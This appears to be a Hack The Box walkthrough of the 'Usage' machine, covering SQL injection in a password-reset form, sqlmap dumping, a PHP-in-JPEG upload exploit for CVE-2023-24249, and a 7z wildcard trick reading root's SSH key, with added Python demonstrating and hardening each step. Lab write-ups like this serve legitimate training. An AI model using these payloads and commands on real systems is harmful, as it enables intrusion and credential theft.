In this post, let's see how to solve the Usage CTF machine from Hack The Box. If you have any doubts, comment down below 👇🏾
Hacking Phases in Usage
Getting an initial foothold: checking open TCP ports with Nmap (run through rustscan).
Identifying the web framework (Laravel) and looking for vulnerabilities to exploit.
Finding SQL injection in the password reset form and dumping the database with sqlmap.
Cracking the admin password hash and logging in to the admin panel.
Exploiting the encore/laravel-admin file upload (CVE-2023-24249) to run PHP and get a user shell.
Obtaining the user flag.
Lateral movement to Xander with credentials found on disk.
Checking sudo privileges and inspecting the custom /usr/bin/usage_management binary with strings.
Abusing a shell wildcard to read /root/.ssh/id_rsa.
Obtaining the root flag.
Let’s Begin
Let’s Hack Usage HTB 😌
Port Scanning
rustscan -a 10.129.209.220
[~] Starting Script(s)
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-19 00:27 +07
Initiating Ping Scan at 00:27
Scanning 10.129.209.220 [2 ports]
Completed Ping Scan at 00:27, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:27
Completed Parallel DNS resolution of 1 host. at 00:27, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 00:27
Scanning 10.129.209.220 [2 ports]
Discovered open port 80/tcp on 10.129.209.220
Discovered open port 22/tcp on 10.129.209.220
Completed Connect Scan at 00:27, 0.03s elapsed (2 total ports)
Nmap scan report for 10.129.209.220
Host is up, received conn-refused (0.030s latency).
Scanned at 2024-04-19 00:27:35 +07 for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Web Service
Whenever I test a web application, I start with Wappalyzer to identify the framework or programming language the challenge was built with.
Here it reported Laravel, and searching HackTricks for that framework turned up something interesting.
Laravel | HackTricks (book.hacktricks.xyz)
User Flag
I dropped some of the candidates I had picked from that page, such as debug mode and the deserialization RCE, because this instance gives no way to trigger them. SQL injection is the only option left, but where is it?
I spent a whole day hunting for the injection point and finally found it in the Reset Password form (the email parameter). Here are the payloads I used to test it.
' ORDER BY 8;-- -
' ORDER BY 9;-- -
ORDER BY 8 returns the normal page, while ORDER BY 9 returns an error page. That proves the input is injected into the query (and that the query selects eight columns). Let's use sqlmap to exploit it!
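The ORDER BY probing above is a column-count oracle: the server behaves normally while n is at most the number of selected columns and errors as soon as it is one higher. As an added example (not code from the original post or from the Usage application), here is that oracle run against a constructed in-memory SQLite table with eight columns, with the vulnerable concatenated lookup next to a parameterised one; the table layout, column names and sample row are assumptions.

```python
import sqlite3

# Constructed stand-in for the application's users table: eight columns,
# so "' ORDER BY 8;-- -" is accepted and "' ORDER BY 9;-- -" raises an error.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY, name TEXT, email TEXT, email_verified_at TEXT,
    password TEXT, remember_token TEXT, created_at TEXT, updated_at TEXT
);
INSERT INTO users (name, email, password)
    VALUES ('admin', 'admin@example.com', '$2y$10$constructedhash');
"""


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, email):
    """Password-reset lookup with the email concatenated into the SQL text."""
    sql = f"SELECT * FROM users WHERE email='{email}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, email):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    return conn.execute("SELECT * FROM users WHERE email=?", (email,)).fetchall()


def errors(lookup, payload):
    """Oracle standing in for 'did the server answer with an error page?'."""
    conn = fresh_db()
    try:
        lookup(conn, payload)
        return False
    except sqlite3.Error:  # e.g. "ORDER BY term out of range"
        return True
    finally:
        conn.close()


def find_column_count(lookup, max_cols=32):
    """Raise ORDER BY n until the first error; the column count is n-1.

    Returns None when no error ever appears (the input is not injected)
    or when even ORDER BY 1 fails (something else is wrong with the query)."""
    for n in range(1, max_cols + 1):
        if errors(lookup, f"' ORDER BY {n};-- -"):
            return n - 1 if n > 1 else None
    return None


if __name__ == "__main__":
    print("concatenated query:", find_column_count(vulnerable_lookup))  # 8
    print("parameterised query:", find_column_count(safe_lookup))      # None
```

The parameterised version never errors whatever n is, because the whole payload is compared against the email column as a string; that is the behaviour you want to see when you retest after a fix.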
sqlmap -r request -p email --batch --level 5 --risk 3 --dbms=mysql --dbs
I won't spell out the remaining sqlmap steps; I think you can take it from here and work out what has to be done next (dump the admin password hash).
After cracking the hash with a password-cracking tool, I used the recovered credentials to log in as admin.
I'm sure everyone sees it: the admin dashboard lists the versions of the installed dependencies.
After researching each dependency for known vulnerabilities, I found something interesting in encore/laravel-admin: arbitrary code execution.
Snyk Vulnerability Database: Critical severity (9.8) Arbitrary Code Execution in encore/laravel-admin, CVE-2023-24249 (security.snyk.io)
I uploaded a payload that shows whether I can execute code, and from there get a reverse shell.
exiftool -Comment="<?php system(\"ping -c 3 10.10.14.28\");?>" payload.jpg
sudo tcpdump -i {interface} icmp
Rename the file so that it carries two extensions, upload it, and watch tcpdump for the ICMP echo requests from the payload. Yummy, I can run commands!!!
The next step is to swap the ping for a reverse shell of your own, which gets you the user flag.
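The exiftool one-liner works because a JPEG comment segment can hold arbitrary bytes, and PHP runs whatever sits between `<?php` and `?>` regardless of what surrounds it, while a typical upload filter only looks at the first bytes of the file. As an added example (not code from the original post or from exiftool), the following Python builds the same kind of polyglot by hand, parses it back segment by segment, and shows that a magic-byte check passes it while a content scan does not. The minimal JPEG (SOI, JFIF APP0 header, EOI, no image data) is constructed for the demo.

```python
# JPEG layout: SOI (FF D8), then marker segments of the form
# FF xx + 2-byte big-endian length (length counts itself, not the marker),
# then entropy-coded data and EOI (FF D9). A COM segment (FF FE) carries
# free-form bytes, which is where exiftool -Comment stores its value.
SOI, EOI, COM, APP0, SOS = b"\xff\xd8", b"\xff\xd9", b"\xff\xfe", b"\xff\xe0", b"\xff\xda"

# Constructed minimal JPEG: SOI + 16-byte JFIF APP0 segment + EOI.
JFIF_APP0 = APP0 + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
MINIMAL_JPEG = SOI + JFIF_APP0 + EOI

# Same payload as the exiftool command in the writeup.
PHP_PAYLOAD = b'<?php system("ping -c 3 10.10.14.28");?>'


def inject_comment(jpeg: bytes, comment: bytes) -> bytes:
    """Insert a COM segment directly after SOI (exiftool places it after the
    APP segments; the position does not matter to the PHP interpreter)."""
    if not jpeg.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    if len(comment) + 2 > 0xFFFF:
        raise ValueError("comment too long for a single segment")
    segment = COM + (len(comment) + 2).to_bytes(2, "big") + comment
    return SOI + segment + jpeg[2:]


def segments(jpeg: bytes):
    """Return [(marker, payload), ...] for the marker segments before EOI/SOS."""
    found, pos = [], 2
    while pos + 4 <= len(jpeg):
        marker = jpeg[pos:pos + 2]
        if marker == EOI:
            break
        length = int.from_bytes(jpeg[pos + 2:pos + 4], "big")
        found.append((marker, jpeg[pos + 4:pos + 2 + length]))
        pos += 2 + length
        if marker == SOS:  # entropy-coded data follows; stop walking markers
            break
    return found


def magic_check(data: bytes) -> bool:
    """Upload filter that only inspects the file header: passes the polyglot."""
    return data.startswith(SOI)


def contains_php(data: bytes) -> bool:
    """Content scan that catches the payload wherever it sits in the file."""
    return b"<?php" in data or b"<?=" in data


if __name__ == "__main__":
    polyglot = inject_comment(MINIMAL_JPEG, PHP_PAYLOAD)
    print("magic check passes:", magic_check(polyglot))
    print("contains php:", contains_php(polyglot))
    print("segments:", [m.hex() for m, _ in segments(polyglot)])
```

The content scan is a heuristic, not a fix: the real defence is never serving uploads through the PHP handler (extension allow-list enforced server-side, storage outside the web root, and re-encoding images, which drops comment segments).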
Lateral movement
I looked for a way to escalate privileges but found nothing, so I listed the users on the system.
cat /etc/passwd | grep /home
I knew I needed Xander's credentials, but how to get them? Simply running ls -al in the working directory turned up a file containing them.
Privilege Escalation
If you've played HackTheBox before, this part is simple: the first command to run once you have a user's password is to check their sudo privileges.
sudo -l
Because this is custom software, there is no GTFOBins entry to lean on. However, we can use the strings command to read what the binary runs.
strings /usr/bin/usage_management
The strings output gave me the answer: the binary archives /var/www/html with a shell wildcard, so the file names in that directory become arguments to the archiver. The technique is the wildcard "spare tricks" page from HackTricks: 7z treats an argument named @id_rsa as a list file of paths to add, and a symlink id_rsa pointing at /root/.ssh/id_rsa makes it read the root SSH key and echo it back in its error output.
Wildcards Spare tricks | HackTricks (book.hacktricks.xyz)
Let's hack by following the steps from HackTricks:
cd /var/www/html
touch @id_rsa
ln -s /root/.ssh/id_rsa id_rsa
Running the sudo binary again makes it print the key. You can get the flag in lots of ways, but since it's cooler to screenshot a root prompt, I used the leaked SSH key to log in as root.
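The root cause is that a shell wildcard turns untrusted file names into archiver arguments. As an added example (not code from the original post or from the Usage binary), the following Python audit flags the entries in a directory that such an expansion would misinterpret, builds an argv that cannot be steered by file names, and reproduces the @id_rsa layout from the steps above in a temporary directory. That directory layout and the backup path are constructed; 7z reading @name as a list file and -snl meaning "store symlinks as links" are documented 7-Zip behaviour.

```python
import os
import tempfile


def dangerous_entries(directory):
    """Flag entries that '7z a backup.zip *' (run from `directory`) would
    misinterpret: names starting with '-' are parsed as options, names
    starting with '@' as 7z list files, and symlinks resolving outside the
    directory pull in files the caller never meant to archive."""
    root = os.path.realpath(directory)
    findings = {}
    for name in sorted(os.listdir(directory)):
        reasons = []
        if name.startswith("-"):
            reasons.append("parsed as option")
        if name.startswith("@"):
            reasons.append("parsed as 7z list file")
        path = os.path.join(directory, name)
        if os.path.islink(path):
            target = os.path.realpath(path)  # follows dangling links too
            if os.path.commonpath([root, target]) != root:
                reasons.append(f"symlink escapes directory -> {target}")
        if reasons:
            findings[name] = reasons
    return findings


def safe_archive_argv(directory, archive="/var/backups/backup.zip"):
    """Argv that takes no file names from the attacker: no shell, no
    wildcard, the directory itself as the single input, '--' to end
    option parsing, and -snl so symlinks are stored as links rather
    than followed. (archive path is an assumption for the example.)"""
    return ["7za", "a", "-snl", "--", archive, os.path.realpath(directory)]


def build_demo_dir():
    """Constructed web root with one legitimate file plus the two entries
    the writeup creates: '@id_rsa' and a symlink 'id_rsa' to the root key."""
    directory = os.path.realpath(tempfile.mkdtemp(prefix="webroot-"))
    with open(os.path.join(directory, "index.php"), "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    open(os.path.join(directory, "@id_rsa"), "w").close()
    os.symlink("/root/.ssh/id_rsa", os.path.join(directory, "id_rsa"))
    return directory


if __name__ == "__main__":
    webroot = build_demo_dir()
    for name, reasons in dangerous_entries(webroot).items():
        print(f"{name}: {', '.join(reasons)}")
    print("hardened argv:", " ".join(safe_archive_argv(webroot)))
```

Note that -snl alone would not have stopped the list-file read, since that happens while 7z parses its arguments, before any archiving; the part of the fix that matters is passing the directory path instead of a wildcard.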
Conclusion
Hacking through the Usage HTB machine provides valuable insights into penetration testing techniques, including enumeration, vulnerability exploitation, and privilege escalation. By understanding these steps, aspiring ethical hackers can enhance their skills and contribute positively to the cybersecurity landscape.
FAQs
What is a Usage HTB Writeup?
- A Usage HTB Writeup is a detailed guide on solving the Usage machine challenge on Hack The Box.